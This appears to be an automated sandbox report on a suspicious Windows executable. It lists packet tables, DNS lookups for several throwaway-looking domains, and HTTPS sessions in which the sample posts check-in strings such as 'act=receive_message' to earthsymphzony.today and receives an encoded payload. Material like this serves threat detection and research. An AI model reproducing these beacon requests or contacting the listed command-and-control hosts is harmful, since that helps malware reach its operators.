                                                                                                      Mar 5, 2025 09:17:18.443263054 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:18.443417072 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:18.443428993 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.013297081 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.013343096 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.013401031 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.014262915 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.014297962 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.513976097 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.514053106 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.517241001 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.517261028 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.517518997 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.526294947 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.526380062 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.526392937 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952356100 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952471972 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952517986 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.952781916 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.952801943 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.480566025 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.480619907 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.480701923 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.481013060 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.481024981 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.952171087 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.952254057 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.953659058 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.953669071 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.953902960 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.955313921 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.956089020 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.956115007 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957051039 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957077026 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957257986 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957283974 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957967997 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957987070 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958106041 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958132029 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958262920 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958290100 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958297968 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958311081 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958437920 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958466053 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958484888 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958602905 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958636045 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971600056 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.971771955 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971791029 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.971817970 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971848965 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.972069025 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.976646900 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470372915 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470467091 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470540047 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.470701933 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.470715046 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.509470940 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509505033 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.509583950 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509856939 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509871006 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.981122971 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.981178999 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.983283997 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.983295918 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.983577967 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.987518072 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.987555027 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.987592936 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479136944 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479233027 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479351044 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479558945 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479571104 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479588032 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479593039 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:35.679136038 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:35.685314894 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:35.685499907 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:35.691704035 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:36.152529955 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:36.157737017 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:36.157790899 CET5792753192.168.2.7162.159.36.2

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 5, 2025 09:16:53.980285883 CET5679253192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:53.989761114 CET53567921.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.075835943 CET6157953192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.086344957 CET53615791.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.101742983 CET5002353192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.112267971 CET53500231.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.124936104 CET6222353192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.134692907 CET53622231.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.268846989 CET5719053192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.297446012 CET53571901.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.372741938 CET6234953192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.384160042 CET53623491.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.396054029 CET5609053192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.409730911 CET53560901.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.415777922 CET5050653192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.426354885 CET53505061.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.432214975 CET6298053192.168.2.71.1.1.1
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET53629801.1.1.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:35.678509951 CET5360099162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:36.189665079 CET53510201.1.1.1192.168.2.7

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Mar 5, 2025 09:16:53.980285883 CET192.168.2.71.1.1.10x498aStandard query (0)dawtastream.betA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.075835943 CET192.168.2.71.1.1.10xb7bcStandard query (0)foresctwhispers.topA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.101742983 CET192.168.2.71.1.1.10x719eStandard query (0)tracnquilforest.lifeA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.124936104 CET192.168.2.71.1.1.10x38b4Standard query (0)collapimga.funA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.268846989 CET192.168.2.71.1.1.10xa225Standard query (0)seizedsentec.onlineA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.372741938 CET192.168.2.71.1.1.10x7f8fStandard query (0)strawpeasaen.funA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.396054029 CET192.168.2.71.1.1.10x13aStandard query (0)quietswtreams.lifeA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.415777922 CET192.168.2.71.1.1.10xda09Standard query (0)starrynsightsky.icuA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.432214975 CET192.168.2.71.1.1.10xf16Standard query (0)earthsymphzony.todayA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Mar 5, 2025 09:16:53.989761114 CET1.1.1.1192.168.2.70x498aName error (3)dawtastream.betnonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.086344957 CET1.1.1.1192.168.2.70xb7bcName error (3)foresctwhispers.topnonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.112267971 CET1.1.1.1192.168.2.70x719eName error (3)tracnquilforest.lifenonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.134692907 CET1.1.1.1192.168.2.70x38b4Name error (3)collapimga.funnonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.297446012 CET1.1.1.1192.168.2.70xa225Name error (3)seizedsentec.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.384160042 CET1.1.1.1192.168.2.70x7f8fName error (3)strawpeasaen.funnonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.409730911 CET1.1.1.1192.168.2.70x13aName error (3)quietswtreams.lifenonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.426354885 CET1.1.1.1192.168.2.70xda09Name error (3)starrynsightsky.icunonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.64.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.32.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.96.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.112.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.16.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.80.1A (IP address)IN (0x0001)false
                                                                                                      Mar 5, 2025 09:16:54.449707985 CET1.1.1.1192.168.2.70xf16No error (0)earthsymphzony.today104.21.48.1A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • earthsymphzony.today

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749700104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:16:55 UTC267OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:16:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2025-03-05 08:16:55 UTC572INHTTP/1.1 403 Forbidden
                                                                                                      Date: Wed, 05 Mar 2025 08:16:55 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BpIJ7uHiYcbFeSVzk5TM%2FSWipGNSxmX95z2h%2B0awfae1lON3g7XOHooiqwUXW0mqL%2FaMu2z0oZz%2BnaZKZAGPCQ%2FVfq9wwEFSrSXBXyc5NbNEaqIYuFIMJojFSU98pKzObnRFOMXKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82c88ab50c358-EWR
                                                                                                      2025-03-05 08:16:55 UTC797INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                      Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                      2025-03-05 08:16:55 UTC1369INData Raw: 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74
                                                                                                      Data Ascii: ref="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document
                                                                                                      2025-03-05 08:16:55 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
                                                                                                      2025-03-05 08:16:55 UTC1021INData Raw: 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d
                                                                                                      Data Ascii: p-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-
                                                                                                      2025-03-05 08:16:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749701104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:16:55 UTC357OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 43
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:16:55 UTC43OUTData Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 77 31 53 6c 46 2d 2d 26 6a 3d
                                                                                                      Data Ascii: act=receive_message&ver=4.0&lid=tw1SlF--&j=
                                                                                                      2025-03-05 08:16:57 UTC830INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:16:57 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8t96%2FhfXr7LH%2FyN%2FcVoyjbMKZBklZ%2FCHICGUsJUZ%2FAGB3gHjclTVdkUdewan2u9%2BBp0IqP1Q67i2JTVBAIIOSVr1hxAw8L4LOjl2UKisR5MJTz6N9Vv2XL7Y8ofhSReL69IvB1TUYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82c8cffca14a8-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=12166&min_rtt=2040&rtt_var=6955&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3066&recv_bytes=1036&delivery_rate=2147058&cwnd=152&unsent_bytes=0&cid=ff872a9f8c70f57b&ts=1476&x=0"
                                                                                                      2025-03-05 08:16:57 UTC539INData Raw: 32 65 66 37 0d 0a 31 46 5a 56 54 33 64 2b 63 71 31 39 51 50 34 4c 37 35 73 30 79 67 4a 61 33 78 53 64 74 58 61 4e 34 73 56 53 6e 76 59 47 58 64 71 76 64 43 4e 74 54 55 70 65 6a 77 34 6c 33 44 47 62 36 55 47 76 4c 6e 69 2b 63 4c 2b 50 45 4f 79 4f 74 6a 65 79 31 48 41 77 2b 4f 34 77 4e 43 4d 45 47 31 36 50 47 44 6a 63 4d 62 54 67 46 71 39 73 65 4f 55 32 2b 4e 38 55 37 49 36 6e 4d 2f 57 5a 64 6a 47 35 76 44 6f 79 4a 78 49 64 46 73 77 52 4c 5a 74 75 69 76 70 65 70 47 73 33 74 33 6d 2f 6d 56 54 6f 6d 4f 64 6f 76 4c 74 6a 4b 62 75 5a 4e 79 59 6b 56 51 4e 65 31 6c 38 6c 6b 43 6e 56 75 56 57 76 59 44 61 35 63 50 62 64 48 75 57 47 70 6a 62 30 68 6d 38 37 73 72 77 30 4d 53 59 59 46 41 4c 42 47 79 71 51 61 49 44 36 46 75 59 67 50 36 55 32 70 35 64 48 33 59 4f 32 49
                                                                                                      Data Ascii: 2ef71FZVT3d+cq19QP4L75s0ygJa3xSdtXaN4sVSnvYGXdqvdCNtTUpejw4l3DGb6UGvLni+cL+PEOyOtjey1HAw+O4wNCMEG16PGDjcMbTgFq9seOU2+N8U7I6nM/WZdjG5vDoyJxIdFswRLZtuivpepGs3t3m/mVTomOdovLtjKbuZNyYkVQNe1l8lkCnVuVWvYDa5cPbdHuWGpjb0hm87srw0MSYYFALBGyqQaID6FuYgP6U2p5dH3YO2I
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 57 51 2b 73 58 66 36 6c 31 71 76 68 37 39 77 70 4e 52 4b 4f 4c 75 6b 64 67 49 75 47 78 49 58 32 56 38 39 30 6e 44 4e 2f 6c 72 6f 4f 48 69 7a 63 2f 44 46 46 66 32 46 71 53 4c 77 6b 57 49 79 75 37 67 30 4d 69 6f 59 45 68 62 49 48 43 71 59 61 49 50 31 58 4b 74 6b 4f 2f 30 34 76 39 41 4d 72 39 6a 6e 41 66 2b 51 59 79 32 37 75 48 51 6f 59 77 78 63 46 38 4e 66 65 74 78 6a 69 2f 52 66 6f 32 63 77 73 57 54 30 32 42 66 6d 68 36 45 36 2f 35 78 75 4f 62 61 33 4d 7a 49 71 42 78 49 62 77 68 77 6f 6d 69 6e 44 75 56 47 77 49 47 44 39 57 50 7a 47 41 74 32 44 74 69 47 38 69 79 6f 6d 2b 4c 45 34 64 33 56 56 46 52 6a 41 45 69 2b 57 5a 34 6a 30 58 36 6c 68 4e 62 74 39 2f 74 38 63 36 34 65 6e 4e 50 47 62 61 6a 2b 32 76 6a 45 7a 4a 78 78 63 58 6f 38 59 4f 74 77 78 7a 63 6c 62
                                                                                                      Data Ascii: WQ+sXf6l1qvh79wpNRKOLukdgIuGxIX2V890nDN/lroOHizc/DFFf2FqSLwkWIyu7g0MioYEhbIHCqYaIP1XKtkO/04v9AMr9jnAf+QYy27uHQoYwxcF8Nfetxji/Rfo2cwsWT02Bfmh6E6/5xuOba3MzIqBxIbwhwominDuVGwIGD9WPzGAt2DtiG8iyom+LE4d3VVFRjAEi+WZ4j0X6lhNbt9/t8c64enNPGbaj+2vjEzJxxcXo8YOtwxzclb
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 68 34 39 4e 59 65 36 59 47 71 50 50 71 55 5a 54 2b 2b 75 6a 51 77 4b 67 63 4f 46 63 6b 4e 4b 4e 77 6e 7a 66 35 4f 36 44 68 34 69 32 62 6f 78 67 4b 74 74 61 51 2b 38 70 4e 79 66 36 66 34 4c 58 63 71 47 56 78 49 6a 78 51 69 6b 47 36 46 2f 31 4b 67 62 7a 65 30 5a 50 37 62 47 76 32 48 70 7a 6e 79 6d 32 67 32 74 62 45 35 50 43 63 59 47 42 66 4f 58 32 7a 63 62 70 57 35 44 75 68 57 4b 4c 42 36 30 64 77 59 35 73 43 34 66 75 58 55 59 7a 50 34 37 6e 51 7a 49 52 30 57 48 38 59 56 4b 4a 4e 67 6a 66 46 66 6f 57 4d 34 73 58 44 2b 32 78 6a 69 68 61 51 31 38 5a 46 6b 4d 37 2b 78 4e 58 64 6a 56 52 73 49 6a 30 64 69 72 47 53 42 38 6c 72 71 56 54 75 7a 65 50 6a 42 56 50 44 4f 76 6e 44 37 6d 43 52 6e 2b 4c 6b 31 4f 69 63 65 45 68 7a 4f 48 79 61 66 59 34 33 32 55 36 35 6f 4d
